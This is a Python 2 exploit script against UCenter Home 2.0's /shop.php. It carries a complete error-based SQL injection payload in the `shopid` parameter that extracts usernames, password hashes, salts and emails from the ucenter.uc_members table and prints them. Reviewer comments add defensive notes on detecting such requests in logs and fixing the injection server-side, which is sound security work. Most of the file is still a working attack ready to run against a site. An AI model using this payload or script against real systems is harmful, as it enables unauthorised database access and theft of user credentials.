#!/usr/bin/env python
# Python 2 script (print statements, urllib2).
#
# Proof-of-concept for a SQL injection through the `shopid` query parameter of
# /shop.php; the usage text names the target as "UCenter_Home_2.0" and the
# banner cites exploit-db entry 14997 as the origin.
#
# Reviewer notes for defenders:
#   * The script only works when the application returns database error text
#     in the HTTP response: it parses a "Duplicate entry ... for key" message.
#     Suppressing database errors in responses removes that channel, but the
#     underlying injection still has to be fixed.
#   * The request carries SQL keywords and `information_schema` in the
#     `shopid` value, so it stands out in web-server access logs and is a
#     reasonable pattern for a WAF or log-search rule.
#   * Presumably `shopid` reaches a SQL statement without integer validation
#     or parameter binding -- the server code is not shown here; confirm
#     against the application source.
import sys
import urllib2
import re
def info():
    """Print the script's provenance banner followed by its usage line."""
    banner = (
        'From:http://www.exploit-db.com/exploits/14997/',
        'http://www.hake.cc/Web_loudong/',
        'changed:qiaoy',
        'exp:',
        ' ./UCenter_Home_2.0.py site',
    )
    # One print statement per entry, so the output is one line per string.
    for text in banner:
        print text
def main():
    """Send one crafted GET request to <site>/shop.php and print what leaks.

    Expects exactly one command-line argument (the site); otherwise prints
    the banner from info() and does nothing else. The response body is
    searched for a MySQL "Duplicate entry '~'...' for key" error message and
    the captured text is split on ':' into fields that are then printed.

    Reviewer notes (defensive):
      * Success depends on the server echoing database error text to the
        client; the regex below matches nothing otherwise.
      * The query string names `information_schema.tables` and
        `ucenter.uc_members`, so a request like this is recognisable in
        access logs for shop.php.
      * The fix belongs server-side: treat `shopid` as an integer / bind it
        as a parameter, and do not return database errors in responses.
    """
    if len(sys.argv) != 2:
        info()
    else:
        site = sys.argv[1]
        # Only the final branch changes anything: `sitesite` is assigned in
        # the first two branches but never read afterwards, so an argument
        # that already has a scheme is used as given.
        if site[0:7] == 'http://':
            sitesite =site
        elif site[0:8] == 'https://':
            sitesite = site
        else:
            site = 'http://'+site
        try:
            # The `shopid` value carries a nested SELECT instead of a number.
            # The inner concat() joins uid, username, password, salt and
            # email with 0x3a (':') and wraps them in 0x7e/0x27 ("~'"), which
            # is the marker the regex below looks for in the error text.
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
            # No timeout is passed to urlopen; the call blocks on the
            # library default.
            Value = urllib2.urlopen(url).read()
            # [0] raises IndexError when the response holds no such error
            # message; that lands in the bare except below.
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
            hacked = Msg.split(':')
            # Index 0 (uid, per the concat order in the URL) is not printed.
            # NOTE(review): `password` is presumably a stored hash, given the
            # separate salt column -- the schema is not shown here.
            print 'Name: '+hacked[1]
            print 'Passwd: '+hacked[2]
            print 'salt: '+hacked[3]
            print 'email: '+hacked[4]
        except:
            # Bare except: network errors, a missing match and short field
            # lists all collapse into the same message, and it also catches
            # KeyboardInterrupt/SystemExit.
            print 'Sorry,I can\'t work............'
# Run main() only when the file is executed as a script, not when imported.
if __name__ == '__main__':
    main()